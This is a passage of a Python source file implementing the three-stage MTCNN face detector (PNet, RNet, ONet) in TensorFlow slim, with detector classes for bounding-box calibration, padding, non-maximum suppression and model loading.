#print ("pool1 shape ",net.get_shape())
net = slim.conv2d(net,num_outputs=16,kernel_size=[3,3],stride=1,scope='conv2')
#print ("conv2 shape ",net.get_shape())
net = slim.conv2d(net,num_outputs=32,kernel_size=[3,3],stride=1,scope='conv3')
#print ("conv3 shape ",net.get_shape())
#batch*H*W*2
conv4_1 = slim.conv2d(net,num_outputs=2,kernel_size=[1,1],stride=1,scope='conv4_1',activation_fn=tf.nn.softmax)
#conv4_1 = slim.conv2d(net,num_outputs=1,kernel_size=[1,1],stride=1,scope='conv4_1',activation_fn=tf.nn.sigmoid)
#print ("cls shape ",conv4_1.get_shape())
#batch*H*W*4
bbox_pred = slim.conv2d(net,num_outputs=4,kernel_size=[1,1],stride=1,scope='conv4_2',activation_fn=None)
#print ("bbox shape ",bbox_pred.get_shape())
#batch*H*W*10
if test_fg:
landmark_pred = slim.conv2d(net,num_outputs=10,kernel_size=[1,1],stride=1,scope='conv4_3',activation_fn=None)
#print ("landmark shape ",landmark_pred.get_shape())
#cls_prob_original = conv4_1
#bbox_pred_original = bbox_pred
if training:
#batch*2
cls_prob = tf.squeeze(conv4_1,[1,2],name='cls_prob')
cls_loss = cls_ohem(cls_prob,label)
#batch
bbox_pred = tf.squeeze(bbox_pred,[1,2],name='bbox_pred')
bbox_loss = bbox_ohem(bbox_pred,bbox_target,label)
#batch*10
if test_fg:
landmark_pred = tf.squeeze(landmark_pred,[1,2],name="landmark_pred")
landmark_loss = landmark_ohem(landmark_pred,landmark_target,label)
else:
landmark_loss = 0
accuracy = cal_accuracy(cls_prob,label)
#L2_loss = tf.add_n(slim.losses.get_regularization_losses())
L2_loss = tf.add_n(tf.losses.get_regularization_losses())
return cls_loss,bbox_loss,landmark_loss,L2_loss,accuracy
#test
else:
#when test,batch_size = 1
cls_pro_test = tf.squeeze(conv4_1, axis=0)
bbox_pred_test = tf.squeeze(bbox_pred,axis=0)
if test_fg:
landmark_pred_test = tf.squeeze(landmark_pred,axis=0)
return cls_pro_test,bbox_pred_test,landmark_pred_test
else:
return cls_pro_test,bbox_pred_test
def R_Net(inputs,label=None,bbox_target=None,landmark_target=None,training=True):
with slim.arg_scope([slim.conv2d],
activation_fn = prelu,
weights_initializer=slim.xavier_initializer(),
biases_initializer=tf.zeros_initializer(),
weights_regularizer=slim.l2_regularizer(0.0005),
padding='valid'):
#print_shape('RNet','input',inputs)
#net = slim.conv2d(inputs, num_outputs=28, kernel_size=[3,3], stride=1, scope="conv1")
net = slim.conv2d(inputs, num_outputs=16, kernel_size=[3,3], stride=1, scope="conv1")
print_shape('RNet','conv1',net)
net = slim.max_pool2d(net, kernel_size=[3, 3], stride=2, scope="pool1", padding='SAME')
print_shape('RNet','pool1',net)
#net = slim.conv2d(net,num_outputs=48,kernel_size=[3,3],stride=1,scope="conv2")
net = slim.conv2d(net,num_outputs=32,kernel_size=[3,3],stride=1,scope="conv2")
print_shape('RNet','conv2',net)
if config.rnet_wide:
net = slim.max_pool2d(net,kernel_size=[3,3],stride=2,scope="pool2",padding='SAME')
else:
net = slim.max_pool2d(net,kernel_size=[3,3],stride=2,scope="pool2")
print_shape('RNet','pool2',net)
if config.rnet_wide:
net = slim.conv2d(net,num_outputs=64,kernel_size=[3,3],stride=1,scope="conv3")
print_shape('RNet','conv3',net)
net = slim.conv2d(net,num_outputs=128,kernel_size=[3,3],stride=1,scope="conv4")
print_shape('RNet','conv4',net)
else:
net = slim.conv2d(net,num_outputs=64,kernel_size=[2,2],stride=1,scope="conv3")
print_shape('RNet','conv3',net)
fc_flatten = slim.flatten(net)
print_shape('RNet','flatten',fc_flatten)
if config.rnet_wide:
fc1 = slim.fully_connected(fc_flatten, num_outputs=128,scope="fc1", activation_fn=prelu)
else:
fc1 = slim.fully_connected(fc_flatten, num_outputs=128,scope="fc1", activation_fn=prelu)
print_shape('RNet','fc1',fc1)
#batch*2
cls_prob = slim.fully_connected(fc1,num_outputs=2,scope="cls_fc",activation_fn=tf.nn.softmax)
print_shape('RNet','cls_fc',cls_prob)
#batch*4
bbox_pred = slim.fully_connected(fc1,num_outputs=4,scope="bbox_fc",activation_fn=None)
print_shape('RNet','bbox_fc',bbox_pred)
#batch*10
if test_fg :
landmark_pred = slim.fully_connected(fc1,num_outputs=10,scope="landmark_fc",activation_fn=None)
print_shape('RNet','landmark_fc',landmark_pred)
#train
if training:
cls_loss = cls_ohem(cls_prob,label)
bbox_loss = bbox_ohem(bbox_pred,bbox_target,label)
accuracy = cal_accuracy(cls_prob,label)
if test_fg :
landmark_loss = landmark_ohem(landmark_pred,landmark_target,label)
else:
landmark_loss = 0
#landmark_loss = 0
#L2_loss = tf.add_n(slim.losses.get_regularization_losses())
L2_loss = tf.add_n(tf.losses.get_regularization_losses())
return cls_loss,bbox_loss,landmark_loss,L2_loss,accuracy
else:
if test_fg:
return cls_prob,bbox_pred,landmark_pred
else:
return cls_prob,bbox_pred
#return cls_prob,bbox_pred
def O_Net(inputs,label=None,bbox_target=None,landmark_target=None,training=True):
with slim.arg_scope([slim.conv2d],
activation_fn = prelu,
weights_initializer=slim.xavier_initializer(),
biases_initializer=tf.zeros_initializer(),
weights_regularizer=slim.l2_regularizer(0.0005),
padding='valid'):
#print_shape('ONet','input',inputs)
net = slim.conv2d(inputs, num_outputs=32, kernel_size=[3,3], stride=1, scope="conv1")
print_shape('ONet','conv1',net)
net = slim.max_pool2d(net, kernel_size=[3, 3], stride=2, scope="pool1", padding='SAME')
print_shape('ONet','pool1',net)
net = slim.conv2d(net,num_outputs=64,kernel_size=[3,3],stride=1,scope="conv2")
print_shape('ONet','conv2',net)
net = slim.max_pool2d(net, kernel_size=[3, 3], stride=2, scope="pool2")
print_shape('ONet','pool2',net)
net = slim.conv2d(net,num_outputs=64,kernel_size=[3,3],stride=1,scope="conv3")
print_shape('ONet','conv3',net)
net = slim.max_pool2d(net, kernel_size=[2, 2], stride=2, scope="pool3", padding='SAME')
print_shape('ONet','pool3',net)
net = slim.conv2d(net,num_outputs=128,kernel_size=[2,2],stride=1,scope="conv4")
print_shape('ONet','conv4',net)
fc_flatten = slim.flatten(net)
print_shape('ONet','flatten',fc_flatten)
fc1 = slim.fully_connected(fc_flatten, num_outputs=256,scope="fc1", activation_fn=prelu)
print_shape('RNet','fc1',fc1)
#batch*2
cls_prob = slim.fully_connected(fc1,num_outputs=2,scope="cls_fc",activation_fn=tf.nn.softmax)
print_shape('ONet','cls_fc',cls_prob)
#batch*4
bbox_pred = slim.fully_connected(fc1,num_outputs=4,scope="bbox_fc",activation_fn=None)
print_shape('ONet','bbox_fc',bbox_pred)
#batch*10
if test_fg:
landmark_pred = slim.fully_connected(fc1,num_outputs=10,scope="landmark_fc",activation_fn=None)
print_shape('RNet','landmark_fc',landmark_pred)
#train
if training:
cls_loss = cls_ohem(cls_prob,label)
bbox_loss = bbox_ohem(bbox_pred,bbox_target,label)
accuracy = cal_accuracy(cls_prob,label)
if test_fg:
landmark_loss = landmark_ohem(landmark_pred, landmark_target,label)
else:
landmark_loss = 0
#landmark_loss = 0
#L2_loss = tf.add_n(slim.losses.get_regularization_losses())
L2_loss = tf.add_n(tf.losses.get_regularization_losses())
return cls_loss,bbox_loss,landmark_loss,L2_loss,accuracy
else:
if test_fg:
return cls_prob,bbox_pred,landmark_pred
else:
return cls_prob,bbox_pred
class FcnDetector(object):
#net_factory: which net
#model_path: where the params'file is
def __init__(self, net_factory, model_path):
#create a graph
graph = tf.Graph()
self.train_face = config.train_face
with graph.as_default():
#define tensor and op in graph(-1,1)
self.image_op = tf.placeholder(tf.float32, name='input_image')
self.width_op = tf.placeholder(tf.int32, name='image_width')
self.height_op = tf.placeholder(tf.int32, name='image_height')
image_reshape = tf.reshape(self.image_op, [1, self.height_op, self.width_op, 3])
#self.cls_prob batch*2
#self.bbox_pred batch*4
#construct model here
#self.cls_prob, self.bbox_pred = net_factory(image_reshape, training=False)
#contains landmark
if self.train_face:
self.cls_prob, self.bbox_pred, _ = net_factory(image_reshape, training=False)
else:
self.cls_prob, self.bbox_pred = net_factory(image_reshape, training=False)
#allow
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, gpu_options=tf.GPUOptions(allow_growth=True)))
saver = tf.train.Saver()
#check whether the dictionary is valid
net_name = model_path.split('/')[-1]
print("net name is ",net_name)
if self.train_face==100:
logs_dir = "../logs/%s" %(net_name)
summary_op = tf.summary.merge_all()
if os.path.exists(logs_dir) == False:
os.mkdir(logs_dir)
writer = tf.summary.FileWriter(logs_dir,self.sess.graph)
model_dict = '/'.join(model_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(model_dict)
print("restore model path",model_path)
readstate = ckpt and ckpt.model_checkpoint_path
assert readstate, "the params dictionary is not valid"
print ("restore models' param")
saver.restore(self.sess, model_path)
if self.train_face==100:
saver.save(self.sess,model_dict+'/resaved/'+net_name+'relu')
'''
logs_dir = "../logs/%s" %(net_factory)
summary_op = tf.summary.merge_all()
if os.path.exists(logs_dir) == False:
os.mkdir(logs_dir)
writer = tf.summary.FileWriter(logs_dir,self.sess.graph)
#summary = self.sess.run()
#writer.add_summary(summary,global_step=step)
'''
def predict(self, databatch):
height, width, _ = databatch.shape
# print(height, width)
cls_prob, bbox_pred = self.sess.run([self.cls_prob, self.bbox_pred],
feed_dict={self.image_op: databatch, self.width_op: width,
self.height_op: height})
return cls_prob, bbox_pred
class Detector(object):
#net_factory:rnet or onet
#datasize:24 or 48
def __init__(self, net_factory, data_size, batch_size, model_path):
graph = tf.Graph()
self.test_fg = 1
with graph.as_default():
self.image_op = tf.placeholder(tf.float32, shape=[batch_size, data_size, data_size, 3], name='input')
#figure out landmark
if self.test_fg:
self.cls_prob, self.bbox_pred, self.landmark_pred = net_factory(self.image_op, training=False)
#self.landmark_pred = tf.identity(self.landmark_pred,name='output')
else:
self.cls_prob, self.bbox_pred = net_factory(self.image_op, training=False)
#self.cls_prob = tf.identity(self.cls_prob,name='cls_out')
#self.bbox_pred = tf.identity(self.bbox_pred,name='bbox_out')
#self.landmark_pred = tf.identity(self.landmark_pred,name='out')
#self.output_op = tf.concat([self.cls_prob, self.bbox_pred], 1)
#self.net_out = slim.flatten(self.output_op,scope='flatten_1')
#self.out_put = tf.identity(self.net_out,name='output')
self.sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True, gpu_options=tf.GPUOptions(allow_growth=True)))
net_name = model_path.split('/')[-1]
print("net name is ",net_name)
saver = tf.train.Saver()
#check whether the dictionary is valid
model_dict = '/'.join(model_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(model_dict)
print ("model_dict is ",model_dict)
readstate = ckpt and ckpt.model_checkpoint_path
#assert readstate, "the params dictionary is not valid"
print ("restore models' param")
saver.restore(self.sess, model_path)
if self.test_fg==100:
saver.save(self.sess,model_dict+'/resaved/'+net_name+'relu')
#print_ckpt('./checkpoint')
self.data_size = data_size
self.batch_size = batch_size
#rnet and onet minibatch(test)
def predict(self, databatch):
# access data
# databatch: N x 3 x data_size x data_size
scores = []
batch_size = self.batch_size
minibatch = []
cur = 0
#num of all_data
n = databatch.shape[0]
while cur < n:
#split mini-batch
minibatch.append(databatch[cur:min(cur + batch_size, n), :, :, :])
cur += batch_size
#every batch prediction result
cls_prob_list = []
bbox_pred_list = []
landmark_pred_list = []
for idx, data in enumerate(minibatch):
m = data.shape[0]
real_size = self.batch_size
#the last batch
if m < batch_size:
keep_inds = np.arange(m)
#gap (difference)
gap = self.batch_size - m
while gap >= len(keep_inds):
gap -= len(keep_inds)
keep_inds = np.concatenate((keep_inds, keep_inds))
if gap != 0:
keep_inds = np.concatenate((keep_inds, keep_inds[:gap]))
data = data[keep_inds]
real_size = m
#cls_prob batch*2
#bbox_pred batch*4
if self.test_fg:
cls_prob, bbox_pred,landmark_pred = self.sess.run([self.cls_prob, self.bbox_pred,self.landmark_pred], feed_dict={self.image_op: data})
#num_batch * batch_size*10
landmark_pred_list.append(landmark_pred[:real_size])
else:
cls_prob, bbox_pred = self.sess.run([self.cls_prob, self.bbox_pred], feed_dict={self.image_op: data})
#num_batch * batch_size *2
cls_prob_list.append(cls_prob[:real_size])
#num_batch * batch_size *4
bbox_pred_list.append(bbox_pred[:real_size])
#num_of_data*2,num_of_data*4,num_of_data*10
if config.Debug:
print("detect shape cls box landmark : ",np.shape(cls_prob_list),np.shape(bbox_pred_list),np.shape(landmark_pred_list))
if self.test_fg:
return np.concatenate(cls_prob_list, axis=0), np.concatenate(bbox_pred_list, axis=0), np.concatenate(landmark_pred_list, axis=0)
else:
return np.concatenate(cls_prob_list, axis=0), np.concatenate(bbox_pred_list, axis=0)
class MtcnnDetector(object):
def __init__(self,
detectors,
min_face_size=24,
stride=2,
threshold=[0.6, 0.6, 0.9],
scale_factor=0.79
):
self.pnet_detector = detectors[0]
self.rnet_detector = detectors[1]
self.onet_detector = detectors[2]
self.min_face_size = min_face_size
self.stride = stride
self.thresh = threshold
self.train_face = config.train_face
if self.train_face:
self.nms_thresh = [0.4,0.4,0.4]
else:
self.nms_thresh = [0.5,0.6,0.6]
self.scale_factor = scale_factor
self.r_out = config.r_out
def convert_to_square(self, bbox):
"""
convert bbox to square
Parameters:
----------
bbox: numpy array , shape n x 5
input bbox
Returns:
-------
square bbox
"""
square_bbox = bbox.copy()
h = bbox[:, 3] - bbox[:, 1] + 1
w = bbox[:, 2] - bbox[:, 0] + 1
max_side = np.maximum(h, w)
square_bbox[:, 0] = bbox[:, 0] + w * 0.5 - max_side * 0.5
square_bbox[:, 1] = bbox[:, 1] + h * 0.5 - max_side * 0.5
square_bbox[:, 2] = square_bbox[:, 0] + max_side - 1
square_bbox[:, 3] = square_bbox[:, 1] + max_side - 1
return square_bbox
def convert_to_rect(self, bbox):
"""
convert bbox to square
Parameters:
----------
bbox: numpy array , shape n x 5
input bbox
Returns:
-------
square bbox
"""
rect_bbox = bbox.copy()
h = bbox[:, 3] - bbox[:, 1] + 1
w = bbox[:, 2] - bbox[:, 0] + 1
h_n = np.maximum(np.maximum(h, w),2)
w_n = h_n/2
rect_bbox[:, 0] = bbox[:, 0] + w * 0.5 - w_n * 0.5
rect_bbox[:, 1] = bbox[:, 1] + h * 0.5 - h_n * 0.5
rect_bbox[:, 2] = rect_bbox[:, 0] + w_n - 1
rect_bbox[:, 3] = rect_bbox[:, 1] + h_n - 1
return rect_bbox
def calibrate_box(self, bbox, reg,height,width):
"""
calibrate bboxes
Parameters:
----------
bbox: numpy array, shape n x 5
input bboxes
reg: numpy array, shape n x 4
bboxes adjustment
Returns:
-------
bboxes after refinement
"""
if config.Debug:
print("shape ",height,width)
bbox_c = bbox.copy()
w = bbox[:, 2] - bbox[:, 0] + 1
w = np.expand_dims(w, 1)
h = bbox[:, 3] - bbox[:, 1] + 1
h = np.expand_dims(h, 1)
reg_m = np.hstack([w, h, w, h])
aug = reg_m * reg
bbox_c[:, 0:4] = bbox_c[:, 0:4] + aug
if config.Debug:
print("x1 ",bbox_c[:,0])
print("y1 ",bbox_c[:,1])
print("x2 ",bbox_c[:,2])
print("y2 ",bbox_c[:,3])
keep = np.where(bbox_c[:,0] >0)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,1] >0)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,2] <width)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,3] <height)
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,2] > bbox_c[:,0])
bbox_c = bbox_c[keep]
keep = np.where(bbox_c[:,3] > bbox_c[:,1])
bbox_c = bbox_c[keep]
return bbox_c
def generate_bbox(self, cls_map, reg, scale, threshold):
"""
generate bbox from feature cls_map
Parameters:
----------
cls_map: numpy array , n x m
detect score for each position
reg: numpy array , n x m x 4
bbox
scale: float number
scale of this detection
threshold: float number
detect threshold
Returns:
-------
bbox array
"""
stride = 2
#stride = 4
cellsize = 12
#cellsize = 25
t_index = np.where(cls_map > threshold)
# find nothing
if t_index[0].size == 0:
return np.array([])
#offset
dx1, dy1, dx2, dy2 = [reg[t_index[0], t_index[1], i] for i in range(4)]
reg = np.array([dx1, dy1, dx2, dy2])
score = cls_map[t_index[0], t_index[1]]
boundingbox = np.vstack([np.round((stride * t_index[1]) / scale),
np.round((stride * t_index[0]) / scale),
np.round((stride * t_index[1] + cellsize) / scale),
np.round((stride * t_index[0] + cellsize) / scale),
score,
reg])
return boundingbox.T
#pre-process images
def processed_image(self, img, scale):
height, width, channels = img.shape
new_height = int(height * scale) # resized new height
new_width = int(width * scale) # resized new width
new_dim = (new_width, new_height)
img_resized = cv2.resize(img, new_dim, interpolation=cv2.INTER_LINEAR) # resized image
img_resized = (img_resized - 127.5) / 128
return img_resized
def pad(self, bboxes, w, h):
"""
pad the the bboxes, alse restrict the size of it
Parameters:
----------
bboxes: numpy array, n x 5
input bboxes
w: float number
width of the input image
h: float number
height of the input image
Returns :
------
dy, dx : numpy array, n x 1
start point of the bbox in target image
edy, edx : numpy array, n x 1
end point of the bbox in target image
y, x : numpy array, n x 1
start point of the bbox in original image
ex, ex : numpy array, n x 1
end point of the bbox in original image
tmph, tmpw: numpy array, n x 1
height and width of the bbox
"""
keep = np.where(bboxes[:,0]< w)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,1]< h)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,2] >0)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,3] >0)
bboxes = bboxes[keep]
keep = np.where(bboxes[:,2] > bboxes[:,0])
bboxes = bboxes[keep]
keep = np.where(bboxes[:,3] > bboxes[:,1])
bboxes = bboxes[keep]
tmpw, tmph = bboxes[:, 2] - bboxes[:, 0] + 1, bboxes[:, 3] - bboxes[:, 1] + 1
num_box = bboxes.shape[0]
dx, dy = np.zeros((num_box,)), np.zeros((num_box,))
edx, edy = tmpw.copy() - 1, tmph.copy() - 1
x, y, ex, ey = bboxes[:, 0], bboxes[:, 1], bboxes[:, 2], bboxes[:, 3]
tmp_index = np.where(ex > w - 1)
edx[tmp_index] = tmpw[tmp_index] + w - 2 - ex[tmp_index]
ex[tmp_index] = w - 1
tmp_index = np.where(ey > h - 1)
edy[tmp_index] = tmph[tmp_index] + h - 2 - ey[tmp_index]
ey[tmp_index] = h - 1
tmp_index = np.where(x < 0)
dx[tmp_index] = 0 - x[tmp_index]
x[tmp_index] = 0
tmp_index = np.where(y < 0)
dy[tmp_index] = 0 - y[tmp_index]
y[tmp_index] = 0
return_list = [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
return_list = [item.astype(np.int32) for item in return_list]
return return_list
def detect_pnet(self, im):
"""Get face candidates through pnet
Parameters:
----------
im: numpy array
input image array
Returns:
-------
boxes: numpy array
detected boxes before calibration
boxes_c: numpy array
boxes after calibration
"""
h, w, c = im.shape
net_size = 12
current_scale = float(net_size) / self.min_face_size # find initial scale
# print("current_scale", net_size, self.min_face_size, current_scale)
im_resized = self.processed_image(im, current_scale)
current_height, current_width, _ = im_resized.shape
# fcn
all_boxes = list()
while min(current_height, current_width) > net_size:
#return the result predicted by pnet
#cls_cls_map : H*w*2
#reg: H*w*4
cls_cls_map, reg = self.pnet_detector.predict(im_resized)
#boxes: num*9(x1,y1,x2,y2,score,x1_offset,y1_offset,x2_offset,y2_offset)
#print("in MtCnnDetector pnet out shape ",cls_cls_map.shape, reg.shape)
#cls_map = cls_cls_map[:,:,1]
#print("scale, threshold ",current_scale,self.thresh[0])
#boxes = self.generate_bbox(cls_map,reg,current_scale,self.thresh[0])
boxes = self.generate_bbox(cls_cls_map[:,:,1], reg, current_scale, self.thresh[0])
current_scale *= self.scale_factor
im_resized = self.processed_image(im, current_scale)
current_height, current_width, _ = im_resized.shape
if boxes.size == 0:
continue
keep = py_nms(boxes[:, :5], self.nms_thresh[0])
boxes = boxes[keep]
all_boxes.append(boxes)
if len(all_boxes) == 0:
return None, None
all_boxes = np.vstack(all_boxes)
# merge the detection from first stage
keep = py_nms(all_boxes[:, 0:5], self.nms_thresh[0])
all_boxes = all_boxes[keep]
bbw = all_boxes[:, 2] - all_boxes[:, 0] + 1
bbh = all_boxes[:, 3] - all_boxes[:, 1] + 1
# refine the boxes
#print('pnet box ',np.shape(all_boxes))
boxes_c = np.vstack([all_boxes[:, 0] + all_boxes[:, 5] * bbw,
all_boxes[:, 1] + all_boxes[:, 6] * bbh,
all_boxes[:, 2] + all_boxes[:, 7] * bbw,
all_boxes[:, 3] + all_boxes[:, 8] * bbh,
all_boxes[:, 4]])
boxes_c = boxes_c.T
return boxes_c,all_boxes
def detect_rnet(self, im, dets):
"""Get face candidates using rnet
Parameters:
----------
im: numpy array
input image array
dets: numpy array
detection results of pnet
Returns:
-------
boxes: numpy array
detected boxes before calibration
boxes_c: numpy array
boxes after calibration
"""
h, w, c = im.shape
height,width = h,w
if self.train_face:
dets = self.convert_to_square(dets)
else:
#dets = self.convert_to_rect(dets)
dets = dets
dets[:, 0:4] = np.round(dets[:, 0:4])
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = self.pad(dets, w, h)
#num_boxes = dets.shape[0]
num_boxes = tmpw.shape[0]
cropped_ims = np.zeros((num_boxes, 24, 24, 3), dtype=np.float32)
if num_boxes <= 0:
return None,None
for i in range(num_boxes):
tmp = np.zeros((tmph[i], tmpw[i], 3), dtype=np.uint8)
tmp[dy[i]:edy[i] + 1, dx[i]:edx[i] + 1, :] = im[y[i]:ey[i] + 1, x[i]:ex[i] + 1, :]
cropped_ims[i, :, :, :] = (cv2.resize(tmp, (24, 24))-127.5) / 128
#cls_scores : num_data*2
#reg: num_data*4
#landmark: num_data*10
if self.train_face:
#cls_scores, reg, _ = self.rnet_detector.predict(cropped_ims)
cls_scores, reg, landmark = self.rnet_detector.predict(cropped_ims)
else:
cls_scores, reg = self.rnet_detector.predict(cropped_ims)
cls_scores = cls_scores[:,1]
keep_inds = np.where(cls_scores > self.thresh[1])[0]
if len(keep_inds) > 0:
boxes = dets[keep_inds]
boxes[:, 4] = cls_scores[keep_inds]
reg = reg[keep_inds]
if self.train_face:
landmark = landmark[keep_inds]
else:
return None, None
if self.train_face:
#width
w = boxes[:,2] - boxes[:,0] + 1
#height
h = boxes[:,3] - boxes[:,1] + 1
landmark[:,0::2] = (np.tile(w,(5,1)) * landmark[:,0::2].T + np.tile(boxes[:,0],(5,1)) - 1).T
landmark[:,1::2] = (np.tile(h,(5,1)) * landmark[:,1::2].T + np.tile(boxes[:,1],(5,1)) - 1).T
#"Minimum"
if self.r_out:
keep = py_nms(boxes, self.nms_thresh[1],"Minimum")
else:
keep = py_nms(boxes, self.nms_thresh[1],"Union")
boxes = boxes[keep]
boxes_c = self.calibrate_box(boxes, reg[keep],height,width)
if self.train_face:
landmark = landmark[keep]
return boxes_c,landmark
else:
return boxes_c,None
def detect_onet(self, im, dets):
"""Get face candidates using onet
Parameters:
----------
im: numpy array
input image array
dets: numpy array
detection results of rnet
Returns:
-------
boxes: numpy array
detected boxes before calibration
boxes_c: numpy array
boxes after calibration
"""
h, w, c = im.shape
height,width = h, w
if self.train_face:
dets = self.convert_to_square(dets)
else:
#dets = self.convert_to_rect(dets)
dets = dets
dets[:, 0:4] = np.round(dets[:, 0:4])
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = self.pad(dets, w, h)
num_boxes = dets.shape[0]
cropped_ims = np.zeros((num_boxes, 48, 48, 3), dtype=np.float32)
real_box_num = 0
for i in range(num_boxes):
if tmph[i]<=1 or tmpw[i]<=1:
continue
tmp = np.zeros((tmph[i], tmpw[i], 3), dtype=np.uint8)
tmp[dy[i]:edy[i] + 1, dx[i]:edx[i] + 1, :] = im[y[i]:ey[i] + 1, x[i]:ex[i] + 1, :]
cropped_ims[i, :, :, :] = (cv2.resize(tmp, (48, 48))-127.5) / 128
real_box_num+=1
if real_box_num <=0:
return None, None
if self.train_face:
cls_scores, reg,landmark = self.onet_detector.predict(cropped_ims)
else:
cls_scores, reg = self.onet_detector.predict(cropped_ims)
#prob belongs to face
cls_scores = cls_scores[:,1]
keep_inds = np.where(cls_scores > self.thresh[2])[0]
if len(keep_inds) > 0:
#pickout filtered box
boxes = dets[keep_inds]
boxes[:, 4] = cls_scores[keep_inds]
reg = reg[keep_inds]
if self.train_face:
landmark = landmark[keep_inds]
else:
return None, None
#width
w = boxes[:,2] - boxes[:,0] + 1
#height
h = boxes[:,3] - boxes[:,1] + 1
if self.train_face:
landmark[:,0::2] = (np.tile(w,(5,1)) * landmark[:,0::2].T + np.tile(boxes[:,0],(5,1)) - 1).T
landmark[:,1::2] = (np.tile(h,(5,1)) * landmark[:,1::2].T + np.tile(boxes[:,1],(5,1)) - 1).T
boxes_c = self.calibrate_box(boxes, reg,height,width)
keep = py_nms(boxes_c,self.nms_thresh[2], "Minimum")
boxes_c = boxes_c[keep]
if self.train_face:
landmark = landmark[keep]
return boxes_c,landmark
else:
return boxes_c,None
#use for video
def detect(self, img):
"""Detect face over image
"""
boxes = None
t = time.time()
# pnet
t1 = 0
if self.pnet_detector:
boxes_c,all_box = self.detect_pnet(img)
if boxes_c is None:
return np.array([]),np.array([])
t1 = time.time() - t
t = time.time()
#print("Pnet out ",boxes_c.shape)
order_idx = np.argsort(boxes_c[:,4])[:-1]
sel_num = config.P_Num if len(boxes_c) > config.P_Num else len(boxes_c)
boxes_c = boxes_c[order_idx[:sel_num]]
#print("Pnet out ",boxes_c.shape)
boxes_p = boxes_c
# rnet
'''
for i in range(10):
print("box_c ",map(int,boxes_c[i]))
print("box",map(int,all_box[i]))
'''
t2 = 0
if self.rnet_detector:
boxes_c,landmark_r = self.detect_rnet(img, boxes_c)
if boxes_c is None:
return np.array([]),np.array([])
t2 = time.time() - t
t = time.time()
bbox_r = boxes_c
if self.r_out:
print("time cost " + '{:.3f}'.format(t1 + t2) + ' pnet {:.3f} rnet {:.3f} '.format(t1, t2))
return bbox_r,landmark_r
# onet
t3 = 0
if self.onet_detector:
#boxes, boxes_c,landmark = self.detect_onet(img, boxes_c)
if config.o_out:
boxes_c,landmark = self.detect_onet(img, boxes_p)
else:
boxes_c,landmark = self.detect_onet(img, boxes_c)
if boxes_c is None:
return np.array([]),np.array([])
t3 = time.time() - t
t = time.time()
#print( "time cost " + '{:.3f}'.format(t1 + t2 + t3) + ' pnet {:.3f} rnet {:.3f} onet {:.3f}'.format(t1, t2,t3))
return boxes_c,landmark
def detect_face(self, test_data):
all_boxes = []#save each image's bboxes
landmarks = []
batch_idx = 0
sum_time = 0
#test_data is iter_
data_num = test_data.size
print("MtcnnDetect image num ",data_num)
#for databatch in test_data:
for i in range(data_num):
databatch = test_data.next()
#databatch(image returned)
if batch_idx % 100 == 0:
print("%d images done" % batch_idx)
im = databatch
# pnet
t1 = 0
if self.pnet_detector:
t = time.time()
#ignore landmark
boxes_c, landmark = self.detect_pnet(im)
t1 = time.time() - t
sum_time += t1
if boxes_c is None:
print("img path: ",test_data.img_path)
print("boxes_c is None...")
all_boxes.append(np.array([]))
#pay attention
landmarks.append(np.array([]))
batch_idx += 1
continue
order_idx = np.argsort(boxes_c[:,4])[:-1]
sel_num = config.P_Num if len(boxes_c) < config.P_Num else len(boxes_c)
boxes_c = boxes_c[order_idx[:sel_num]]
# rnet
t2 = 0
if self.rnet_detector:
t = time.time()
#ignore landmark
boxes_c, landmark = self.detect_rnet(im, boxes_c)
t2 = time.time() - t
sum_time += t2
if boxes_c is None:
all_boxes.append(np.array([]))
landmarks.append(np.array([]))
batch_idx += 1
continue
# onet
t3 = 0
if self.onet_detector:
t = time.time()
boxes_c, landmark = self.detect_onet(im, boxes_c)
t3 = time.time() - t
sum_time += t3
if boxes_c is None:
all_boxes.append(np.array([]))
landmarks.append(np.array([]))
batch_idx += 1
continue
#print("time cost " + '{:.3f}'.format(sum_time) + ' pnet {:.3f} rnet {:.3f} onet {:.3f}'.format(t1, t2,t3))
all_boxes.append(boxes_c)
landmarks.append(landmark)
batch_idx += 1
#num_of_data*9,num_of_data*10
return all_boxes,landmarks
# test demo
test_relu =config.train_face
def parameter():
parser = argparse.ArgumentParser(description='Mtcnn camera test')
parser.add_argument("--min_size",type=int,default=24,\
help='determin the image pyramid and the lest is 12')
parser.add_argument("--threshold",type=float,default=[0.5,0.7,0.9],nargs="+",\
help='filter the proposals according to score')
parser.add_argument("--slid_window",type=bool,default=False,\
help='if true Pnet will use slid_window to produce proposals')
parser.add_argument('--batch_size',type=int,default=[1,256,32],nargs="+",\
help='determin the pnet rnet onet input batch_size')
parser.add_argument('--epoch_load',type=int,default=[32,2700,25],nargs="+",\
help='load the saved paramters for pnet rnet onet')
parser.add_argument('--file_in',type=str,default='None',\
help='input file')
return parser.parse_args()
def load_model(epoch_load):
if test_relu==5 or test_relu==100:
if config.rnet_wide:
#5,500,60; 5,1700,60
prefix = ["../data/MTCNN_model/PNet_landmark/PNet", "../data/MTCNN_model/RNet_landmark/rnet_wide/RNet", "../data/MTCNN_model/ONet_landmark/ONet"]
else:
# 5,40,60
prefix = ["../data/MTCNN_model/PNet_landmark/PNet", "../data/MTCNN_model/RNet_landmark/RNet", "../data/MTCNN_model/ONet_landmark/ONet"]
else:
#epoch_load = [32,30,25],[32,4400,25]
#prefix = ["../data/MTCNN_model/PNet_landmark/v1_trained/PNet", "../data/MTCNN_model/RNet_landmark/v1_trained/RNet", "../data/MTCNN_model/ONet_landmark/v1_trained/ONet"]
#[205,500,200]
prefix = ["../../trained_models/MTCNN_bright_model/PNet_landmark/PNet", "../../trained_models/MTCNN_bright_model/RNet_landmark/RNet", "../../trained_models/MTCNN_bright_model/ONet_landmark/ONet"]
#pedestrain [80,360,200],[580,4900,600],[1600,4500,600],[1600,2900,4000]
